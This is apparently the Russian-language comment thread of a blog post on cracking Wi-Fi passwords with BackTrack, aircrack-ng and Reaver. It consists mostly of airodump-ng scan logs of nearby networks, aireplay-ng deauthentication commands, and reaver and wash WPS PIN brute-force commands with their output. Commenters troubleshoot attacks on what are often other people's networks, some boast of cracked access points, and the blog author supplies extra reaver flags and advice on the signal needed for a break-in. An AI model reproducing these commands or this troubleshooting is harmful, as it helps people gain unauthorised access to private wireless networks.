    C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
    00:02:CF:CF:41:01 -73 19 0 0 4 54 WPA2 CCMP PSK KMB g
    F8:D1:11:43:CC:A0 -93 7 0 0 8 54e. WPA2 CCMP PSK TP-LIg
    00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <leng

    BSSID STATION PWR Rate Lost Frames Probe

    CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
    00:02:CF:CF:41:01 -73 20 0 0 4 54 WPA2 CCMP PSK KMB
    F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK
    00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length

    BSSID STATION PWR Rate Lost Frames Probe

    CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
    00:02:CF:CF:41:01 -71 21 0 0 4 54 WPA2 CCMP PSK KMB
    F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_4
    00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:

    BSSID STATION PWR Rate Lost Frames Probe

    CH 4 ][ Elapsed: 8 s ][ 2012-05-16 16:10

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    C8:60:00:93:55:B4 -73 15 0 0 1 54e WPA2 CCMP PSK Oleg
    00:02:CF:CF:41:01 -70 22 0 0 4 54 WPA2 CCMP PSK KMB
    F8:D1:11:43:CC:A0 -94 8 0 0 8 54e. WPA2 CCMP PSK TP-LINK_43
    00:13:1A:57:65:A0 -102 2 1 0 1 11e. OPN <length:

    BSSID STATION PWR Rate Lost Frames Probe

    CH 12 ][ Elapsed: 4 mins ][ 2012-05-16 16:14

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:02:CF:CF:41:01 -65 703 9 0 4 54 WPA2 CCMP PSK KMB
    C8:60:00:93:55:B4 -71 374 39 0 1 54e WPA2 CCMP PSK Oleg
    F8:D1:11:43:CC:A0 -82 249 23 0 8 54e. WPA2 CCMP PSK TP-LINK_43CCA
    00:13:1A:57:65:A0 -101 29 18 0 1 11e. OPN
    1C:7E:E5:FF:90:72 -101 62 0 0 11 54e WEP WEP DIR-300NRU
    D8:5D:4C:D2:E3:C8 -100 21 0 0 11 54 . WPA2 CCMP PSK Internet

    BSSID STATION PWR Rate Lost Frames Probe

    (not associated) 30:38:55:C4:31:3A -93 0 - 1 0 5 00:02:CF:CF:41:01 00:19:D2:23:5E:D3 -84 54 - 1 0 82 KMB F8:D1:11:43:CC:A0 00:1C:BF:3B:7E:70 -97 54e- 1e 0 20
    root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 mon0
    16:15:41 Waiting for beacon frame (BSSID: 00:02:CF:CF:41:01) on channel 12
    16:15:51 No such BSSID available.
    Please specify an ESSID (-e).
    root@bt:~# aireplay-ng -0 1 -a 00:02:CF:CF:41:01 -c 00:19:D2:23:5E:D3 -e mon0
    No replay interface specified.
    "aireplay-ng --help" for help.
    root@bt:~#

  • Sg says:

    Статья потрясающая, огромное спасибо!

  • maksym says:

    Zdravstvuite.
    Posle togo kak dopisyvaiu (-no-nacks) v komandu:
    root@bt:~# revear -i mon0 -b bsssidxxx -c 1 -vv –no-nacks
    Poiavliaetsia takoe:
    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011,Tactical Netwark Solutions,Craig Heffner
    Chto ia ne tak delaiu.
    Spasibo

  • pit55555 says:

    что означает [!] WARNING: Failed to associate with 00;25;86;c7;79 (ESSID:Vpubud_2)

    • Hub-lex says:

      Это значит не удалось подключиться к АР. Старайтесь переводить сообщения, которые выводятся – их не так уж и сложно перевести.

  • boom says:

    Ночи доброй!Почему не ловятся дата пакеты?

  • boom says:

    root@bt:~# iwconfig
    lo no wireless extensions.

    wlan0 IEEE 802.11bg ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry long limit:7 RTS thr:off Fragment thr:off
    Encryption key:off
    Power Management:off

    eth0 no wireless extensions.
    root@bt:~# airmon-ng

    Interface Chipset Driver

    wlan0 RTL8180/RTL8185 rtl8180 – [phy0]

    root@bt:~# airmon-ng start wlan0

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    2339 dhclient3
    2341 dhclient3
    Process with PID 2339 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan0 RTL8180/RTL8185 rtl8180 – [phy0]
    (monitor mode enabled on mon0)

    root@bt:~# airodump-ng mon0

    CH 6 ][ Elapsed: 6 mins ][ 2012-05-25 10:32

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    00:16:E3:F4:C0:B8 0 1020 0 0 11 54 WPA2 TKIP PSK ZXDSL
    84:C9:B2:57:5D:A5 0 893 0 0 5 54e. WPA2 CCMP PSK ASUS

    BSSID STATION PWR Rate Lost Frames Probe

    (not associated) 00:14:D1:4B:D0:31 0 0 - 1 0 11

    Вот посмотри буть так добр!День добрый!

  • Taler says:

    Здравствуйте. Уже стал отчаиваться. Купил адаптер TP-Link TL-WN7200ND, специально для BackTrack и сопутствующих программ(чипсет Ralink RT3070). Перебор WPS не начинает ни в какую! wash начинает только при команде Wash -i mon0 -C иначе лезут ошибки. Скидываю лог всех своих действий. Да, reaver устанавливаю вручную из папки, причем встроенный в ноутбук адаптер(Broadcom) работает на ура…
    root@bt:~# apt-get install reaver
    Reading package lists… Done
    Building dependency tree
    Reading state information… Done
    reaver is already the newest version.
    0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
    root@bt:~# iw reg set BO
    root@bt:~# iwconfig wlan1 txpower 27
    root@bt:~# airmon-ng start wlan1

    Found 2 processes that could cause trouble.
    If airodump-ng, aireplay-ng or airtun-ng stops working after
    a short period of time, you may want to kill (some of) them!

    PID Name
    2687 dhclient3
    2750 dhclient3
    Process with PID 2750 (dhclient3) is running on interface wlan0

    Interface Chipset Driver

    wlan1 Ralink RT2870/3070 rt2800usb – [phy1]
    (monitor mode enabled on mon0)
    wlan0 Broadcom b43 – [phy0]

    root@bt:~# airodump-ng mon0

    CH 9 ][ Elapsed: 8 s ][ 2012-05-25 18:56

    BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

    84:C9:B2:AB:2C:2A -48 5 0 0 6 54e WPA2 CCMP PSK Veram
    00:1B:11:32:61:88 -60 5 0 0 6 54 WPA TKIP PSK k-233
    FC:75:16:D7:F7:ED -66 5 0 0 6 54e WPA2 CCMP PSK Utel
    1C:7E:E5:D2:8B:14 -101 9 34 7 1 54e WPA CCMP PSK DIR-3
    BSSID STATION PWR Rate Lost Frames Probe
    1C:7E:E5:D2:8B:14 1C:62:B8:17:58:25 -127 0e- 0 0 35

    root@bt:~# wash -i mon0

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    ---------------------------------------------------------------------------------------------------------------
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…

    root@bt:~# wash -i mon0 -C

    Wash v1.4 WiFi Protected Setup Scan Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    BSSID Channel RSSI WPS Version WPS Locked ESSID
    —————————————————————————————————————
    FC:75:16:D7:F7:ED 6 -67 1.0 No Uxxx

    root@bt:~# reaver -i mon0 -b FC:75:16:D7:F7:ED -vv -c 6

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 6
    [+] Waiting for beacon from FC:75:16:D7:F7:ED
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [+] Nothing done, nothing to save.
    root@bt:~# reaver -i mon0 -b FC:75:16:D7:F7:ED -vv -c 6 -n

    Reaver v1.4 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

    [+] Switching mon0 to channel 6
    [+] Waiting for beacon from FC:75:16:D7:F7:ED
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [!] WARNING: Failed to associate with FC:75:16:D7:F7:ED (ESSID: Utel)
    [+] Nothing done, nothing to save.

    Некоторые шаги повторно выполнил, чтобы показать откуда начинаются проблемы. :roll:
    Handshake рубит на ура! По уровню сигнала всё хорошо, встроенная карта в пять раз слабее, но общается с точкой без затруднений :neutral:
    Очень прошу, помогите решить проблему! :cry:

    • Hub-lex says:

      поробуйте так – # reaver -i mon0 -b XX:XX:XX:XX:XX:XX -c 6 -e network_name -vv -A

      • Taler says:

        Всё сделал, как Вы и сказали. И даже больше, не желает работать, может быть дело в драйвере, вшитом в BackTrack5 R2? Еще был замечен странный факт, несколько раз после остановки Reaver перебор вероломно продолжается и никак не останавливается :cry:

        CH 5 ][ Elapsed: 1 min ][ 2012-05-26 06:48 ][ Decloak: FC:75:16:D7:F7:ED

        BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

        84:C9:B2:AB:2C:2A -50 79 0 0 6 54e WPA2 CCMP PSK Veram
        00:1B:11:32:61:88 -63 65 0 0 6 54 WPA TKIP PSK k-233
        FC:75:16:D7:F7:ED -66 67 36 0 6 54e WPA2 CCMP PSK Utel
        1C:7E:E5:D2:8B:14 -67 84 0 0 1 54e WPA CCMP PSK DIR-3

        BSSID STATION PWR Rate Lost Frames Probe

        FC:75:16:D7:F7:ED 90:F6:52:0D:7E:0A 0 1 - 1 0 699

        root@bt:~# reaver -i mon0 -b FC:75:16:D7:F7:ED -c 6 -vv -e Utel -vv -A

        Reaver v1.4 WiFi Protected Setup Attack Tool
        Copyright (c) 2011, Tactical Network Solutions, Craig Heffner

        [+] Switching mon0 to channel 6
        [+] Waiting for beacon from FC:75:16:D7:F7:ED
        [+] Associated with FC:75:16:D7:F7:ED (ESSID: Utel)
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [!] WARNING: Receive timeout occurred
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received M1 message
        [+] Sending M2 message
        [+] Received M1 message
        [+] Sending WSC NACK
        [+] Sending WSC NACK
        [!] WPS transaction failed (code: 0×03), re-trying last pin
        [+] Trying pin 12345670
        [+] Sending EAPOL START request
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response
        [+] Received identity request
        [+] Sending identity response

        И так далее. На всех WPS! :cry:

  • User says:

    Хотел спросить. Вы часто замечаете, что обязательным условием является хороший сигнал от AP. Насколько хороший? 70db, 60db, а может быть и все 30db? А то все эти полоски – вещь весьма относительная.

    • Hub-lex says:

      В радио-сетях уровень сигнала играет ОЧЕНЬ важную роль! Это один из обязательных параметров, на которые стоит смотреть (обращать внимание). Взлом, на мой взгляд, можно осуществлять при уровне сигнала от 65%.

      • User says:

        А нельзя ли в дицебелах. Мне в этих процентах, видит Бог, проблематично ориентироваться. 65% – это 35 db, правильно я понимаю?

  • User says:

    Хотел спросить. Может быть не совсем в тему. Извеняюсь. Не собираетесь ли Вы сделать пост по уязвимости Hole 196. Очень интересует. А то информация повсеместно самая поверхностная.

    • Hub-lex says:

      Если будет время. А так в ближайшее время будет много статей по взлому.

  • komrad7 says:

    Taler.
    У меня такой же адаптер,тоже были проблеммы с reaver,проблемма как я понял в драйвере ,попробуйте вот этот диск http://www.wifislax.com/category/download/nuevas-versiones/ в кляксе(minidwep-gtk) всё замечательно работает.Сломал 5 точек даже с низким сигналом

    • Taler says:

      komrad7, а есть какая–то возможность раскачать на работу этот адаптер в reaver, начинал ломать сети какраз со slax, правда версии старой, но потом по оределенным причинам прешел на reaver, лично для меня эти причины очень весомы. Иначе весь смысл этого адаптера для меня пропадает…((( На форуме есть умельцы, способные подправить драйвер???

  • komrad7 says:

    Taler.
    Я перепробовал почти все диски и бактрак и беини,xiaopan но именно реавер для нашего адаптера работает в wifislax только в кляксе(minidwep-gtk),в других прогах в инфляторе или чисто реавере он не ассоциируется с точкой,конкретно объяснить почему немогу.В кляксе -запускаете программу (кликаете “Кляксу” – ОК – клик “Encrypt WPA” – scan
    -выбираете сетку с “хвостиком” _wps -> click “Reaver” ,или пробовать ставить патченные драйвера в бактрак

  • Роман says:

    Добрый вечер. Было упоминание аренды сервера амазон. Как это организовать и какова цена вопроса?

  • timon says:

    доброго времени суток! вопрос.. имея подключение и ключи к моему вай фай этот человек может посмотреть информацию хранящююся на моем жеском диске? как он может это сделать ?
    заранее благодарен.

  • Massan says:

    Здравствуйте, у меня есть ноут (кор5 и тд), загружаю чел вирт бокс и так пробовал, смысл когда дохожу до “IWconfig” мне показывавает
    lo – no wireless extensions что то такое и eth0 Тоже самое более ничего не пишет. В чем проблемка и можно ли ее как то решить?

    • Hub-lex says:

      Здравствуйте. Не надо заниматься взломом wifi из под виртуальной машины. Могут быть проблемы с драйверами, как скорее всего у вас.
      Загрузите ВТ5 на USB.

  • вит says:

    Здравствуйте, по какой причине не запускается airmon -ng? command not found. установлен bt5r2

    • Hub-lex says:

      Здравствуйте, такого быть не может, чтобы airmon-ng не было в ВТ5R2. Может быть все таки BT5R1?

  • timon says:

    еще вопросик… ввожу стандартные команды
    iwconfig

    airmon-ng start wlan0

    airodump-ng mon0
    reaver -i mon0 -b ххххххххх -vv идет поиск до 15% а потом то что ниже … и так постоянно без изменений.
    в чем причина ? как это лечится ? спасибо.

    WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [!] WARNING: 25 successive start failures
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 17115674
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    ^C

  • алексей says:

    Респект создателю спасибо за труды и ответы.Я чайник и без комментариев не смог бы разобраться,а самому задавать глупые вопросы стремно. Для таких как я все показанные команды в специальном окне(терминале) в программе чтобы до этого дойти надо скачать ВТ5R2, создать диск записать его на флешку(очень простая программа (Li..Li..) или dvd потом при включении комп. нажимаем F2 переходим в биос и там ставим загрузку с флешки или DVD и дальше по статье у меня сутки ушло разобраться но если б я понимал что делать без скачки на всё 10 минут,буквенный пароль за 6 часов взломал.

  • AndyShy says:

    airmon-ng не запускается, по тому что он пишется, как я написал, а не airmon -ng , т.е. без пробела!

  • Сергей says:

    Приветствую! А на Висту можно установить Reaver?

  • Сергей says:

    Здравствуйте,

    у меня такой вопрос. Работаю с Backtrack BT R2. Пробовал вчера подобрать пароль к 3 разным сетям, Wep, WPA, WPA-2. Дохожу поэтапно до строчки кaк у вас в скриншоте: reaver -i mon0 -b 8D:AE:9D:65:1F:B2 -vv, когда Reaver по идее должен начинать подбор пароля, но после этого пишет мне вот что:

    Warning: Failed to associate with 2D:34:63:53:TU:52 (ESSID FIG)

    или вобще пусто, то есть не пишет ничего

    или старается начать подбор по пину, но пин при этом выписывает один и тот же (!), беспрерывно повторяя эту попытку с одним и тем же пином.
    Tо есть такое ощущение, что Reaver виснет на этом рубеже.
    [+] Waiting for beacon from 2D:34:63:53:TU:52
    [+] Switching mon0 to channel 1
    [+] Switching mon0 to channel 2
    [+] Switching mon0 to channel 3
    [+] Switching mon0 to channel 4
    [+] Switching mon0 to channel 5
    [+] Switching mon0 to channel 6
    [+] Switching mon0 to channel 7
    [+] Switching mon0 to channel 8
    [+] Switching mon0 to channel 9
    [+] Switching mon0 to channel 10
    [+] Switching mon0 to channel 11
    [+] Associated with 2D:34:63:53:TU:52 (ESSID:FIG)
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [!] WARNING: Receive timeout occurred
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0?02), re-trying last pin
    [+] Trying pin 12345670

    Mac-adress фильтры каким нибудь образом могут помешать подбору Reaver?om пароля в данном случае? Mеня бы это удивило, поскольку я ВСЕГДА меняю Mac-адрес на тот, чью сеть я проверяю на прочность, то есть дублирую его.
    Вопрос:
    Существует ли программа, позволяющая определять наличцие активной клиентской точки, то есть которая покажет мне, сидит ли человек сейчас в сети или нет и если да, то как мне ее вызвать из под BackTrack? И делать что если у человека есть W-lan сеть но он ей не пользуется, а скачивает все через провод-LAN?
    А то так можно еще 1000 лет прождать и если никто не пользуется W-lan?ом, то и трафика нет. А наличие активной клиентской точки и трафика обязательно, без этого взлом невозможeн!

    Надеюсь на скорый ответ.

    С уважением

    Сергей

  • Сергей says:

    Сигнал где то от -50 до -65

  • Сергей says:

    Не пойму,куда вопрос мой делся,ну ладно… Так,на висту можно райвер поставить или нет? Спасибо.

    • Сергей says:

      Извиняюсь,инет глючил! :sad: Скачал,загнал на DVD,а теперь значит зря? :cry: Уж очень хотелось поэксперементировать! :smile:

  • Сергей says:

    И да, после того, как я ввожу wash -i mon0 или
    wash -i mon0 –scan

    пишет

    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…
    [!] Found packet with bad FCS, skipping…

    Как это понимать?

  • Сергей says:

    Сергею:

    На Висту можешь даже не пытаться, замучаешся исправлять ошибки в компиляции, если он вобще на нее встанет.

    • Сергей says:

      Приветствую! Т.е. данный софт только под LINUX?

      • Hub-lex says:

        Можно установить и под Windows, но так делают только … В общем работай с Linux.

  • Сергей says:

    Вы меня извините,Hub-lex! Просто я пока что не силён во всей этой науке. У меня есть ноут с вистой и я искал программу для взлома WPA. Хотелось бы просто узнать,можно ли воспользоваться этой прогой с тем,что имею под рукой? И если можно,то как это сделать абсолютому пока что неучу? :-)Перелопатив инет,наткнулся на Ваш блог. Вы очень просто и доходчиво обьясняете.Очень редко встретишь на просторах сети человека терпеливого и умеющего толково и грамотно подать материал.Вы из таких,за что Вам огромная благодарность.

    • Hub-lex says:

      Большое спасибо! Рад, что блог вам интересен.
      Повторюсь еще раз, не надо ничего делать из под Windows. Только Linux (BackTrack). Поэтому для начала скачайте BT5 (http://www.backtrack-linux.org/downloads/) и загрузите его на флешку (http://www.backtrack-linux.org/tutorials/usb-live-install/).

      По Linux для начала можете прочитать статьи – http://www.levinkv.ru/category/linux/
      А так, в скором времени появятся on-line курсы по Linux уровня LPIC1. Так что не пропустите, если интересно =)

    • User says:

      Учиться, учиться и учиться, как завещал великий Л… Было бы время, желание, да трезвая голова…

      • Hub-lex says:

        Кому нужно, тот всего добьется.
        Кто будет жить лишь мечтами о том, что было бы не плохо знать/уметь то или иное – жалок, и не нет ему оправдания…

  • Сергей says:

    Уважаемый Hub-lex

    вы, так и не ответили на мой вопрос.

    :sad:

  • Серго says:

    :-) Нас тут просто два Сергея! Я буду Серго и в 16.34 писал я!:-) Задам свой вопрос.Ubuntu Portable Remix подойдёт для установки на Windows Vista и будет ли работать BT5 на этой виртуальной машине? Спасибо!

    • Hub-lex says:

      Ну по идеи должна, так как Ubuntu Portable Remix предназначен для запуска linux приложений в windows. Однако этим не занимался, так как есть BackTrack.

  • warning detected ap rate limiting waiting 60 seconds before re-checking says:

    Уважаемый Hub-lex

    вы так и не ответили на мой вопрос
    3 Июнь 2012 в 16:30 и
    3 Июнь 2012 в 19:29

    :sad:

  • Сергей says:

    Здравствуйте,

    проблему c WASH решил.
    Вот как это должно выглядеть, тогда все работает:

    wash -i mon0 –s -C

  • Сергей says:

    Здравствуйте,

    проблему c WASH решил.
    Вот как это должно выглядеть, тогда все работает:

    wash -i mon0 -C -s

  • Сергей says:

    И еще, видел пишут, что в BackTrack R2 комадой netstat -nr на возможно определить активные клиентские точки, но это не так.

  • Серго says:

    Приветствую! При запуске с DVD обрывается запуск ВТ2.Криво скачалось или что другое? Спасибо!

    • Hub-lex says:

      Не надо пользоваться live DVD. Скорость считывания гораздо ниже, чем у USB.
      А по поводу “обрывается” ничего не могу сказать, мало данных.

  • stasalitis says:

    Ещё один плюсик автору статьи. Всё написано достаточно доходчего. Действовал пошагово, согласно инструкции.Получилось всё с первого раза. Подбор ключа запороленной ТД производился при подключении к свободной ТД с качеством связи в 65% на ноуте с чипсетом адаптера Intel 1050. На подбор ключа (10 цифр) ушло 20 часов. Подписался на рассылку)) Спасибо и успехов в дальнейшем!

  • Никита says:

    А у меня такой вопрос:

    Во время сканировании выключаем точку жертвы.
    Выходим, сессия сохраняется.
    Включаем точку снова, загружаем сессию.

    А имеет смысл в этом случае продолжать, или нужно начинать сначала (у точки будет тот-же PIN при старте?)

    • Hub-lex says:

      Если сессия сохранилась и вы ее запустили снова. Тогда будет продолжаться, с того места, где остановились.

  • Cергей says:

    Добрый день!
    Подскажите пожалуйста.
    Я скачал BT5R1 по Вашей ссылке. Записал на DVD RW. Запускаю его, но машина не загружается.
    Т.е. я понимаю должен произойти автозапуск, а у меня открываеться как папка с файлами.Может надо установить прогу для автозапуска???? Посоветуйте.
    Заранее спасибо.

  • Серго says:

    Сергею.
    Надо через BIOS приоритетом для загрузки системы указать не Ваш жёсткий диск,а привод CD\DVD.Должно всё пойти.BT5 запускается как самостоятельная операционка.

  • Tigerslot says:

    Добрый день,

    нужна помощь в работе с Reaver 1.4 под Backtrack 5 R2, срочно!

    Перебор пинкода доходит до 99,99 % и глохнет
    Простоял сутки, набрал 99,99 % и встал на 99.99% с pin 24315998
    Пробовал вот так:
    reaver -i mon0 -b хх.хх.хх.хх.хх.хх -c 6 –pin 24315998 –vv

    получаю

    [+] Waiting for beacon from 00.00.00.00.55.00
    [+] Switching mon0 to channel 5
    [+] Associated with 00.00.00.00.55.00(ESSID: ongbak)
    [+] Trying pin 24315998
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 24315998
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0×02), re-trying last pin
    [+] Trying pin 24315998
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received M1 message
    [+] Sending M2 message
    [+] Received M3 message
    [+] Sending M4 message
    [!] WARNING: Receive timeout occurred
    [+] Sending WSC NACK
    [+] Trying pin 24315998
    Пробовал:
    reaver -i mon0 -c 6 -b 00.00.00.00.55.00 -w –N -S -1 300 после восстановления сессии.
    После этого начинает подбирать пин начиная с 92, 54 % и на выходе вот что:

    смотри *

    но уже БЕЗ WARNING: Receive timeout occured

    Также пробовал так:
    -i mon0 -b 00.00.00.00.55.00 -c 6 –d 30 –vv

    Подскажите пожалуйста можно ли как нибудь добить pin до 100% ?
    Первые 4 цифры правильние, осталось набрать последние 4.
    Есть ли еще какие нибудь префиксы помимо -p –p -S -d -w -N -L ?
    Или нужно перебирать заново, указав при том первую часть пина, что бы подобрал вторую часть?
    Подскажите пожалуйста как это можно сделать?

    p.s.: Как узнать какой рутер не знаю, так как рутер не близко, по сигналу -70/-71.
    Узнал только модель производителя по мэк адресу здесь: http://www.coffer.com/mac_find/

    Cisco Systems

  • Tigerslot says:

    *

    92,50 % comlete@2012-06-10 13:23:12(5 seconds/pin)
    92,50 % comlete@2012-06-10 13:33:46(5 seconds/pin)
    92,50 % comlete@2012-06-10 13:42:32(5 seconds/pin)
    92,53 % comlete@2012-06-10 13:46:28(5 seconds/pin)
    92,54 % comlete@2012-06-10 13:48:05(5 seconds/pin)
    92,54 % comlete@2012-06-10 13:55:18(5 seconds/pin)
    92,55 % comlete@2012-06-10 13:56:23(6 seconds/pin)
    92,56 % comlete@2012-06-10 13:56:37(6 seconds/pin)
    92,56 % comlete@2012-06-10 13:57:22(6 seconds/pin)
    92,57 % comlete@2012-06-10 13:58:41(6 seconds/pin)
    92,58 % comlete@2012-06-10 13:59:03(6 seconds/pin)
    92,78 % comlete@2012-06-10 14:03:09(6 seconds/pin)
    93,12 % comlete@2012-06-10 14:14:14(7 seconds/pin)
    93,24 % comlete@2012-06-10 14:18:25(7 seconds/pin)
    93,37 % comlete@2012-06-10 14:23:54(7 seconds/pin)
    93,40 % comlete@2012-06-10 14:28:17(7 seconds/pin)
    93,40 % comlete@2012-06-10 14:33:48(7 seconds/pin)
    93,49 % comlete@2012-06-10 14:42:33(7 seconds/pin)
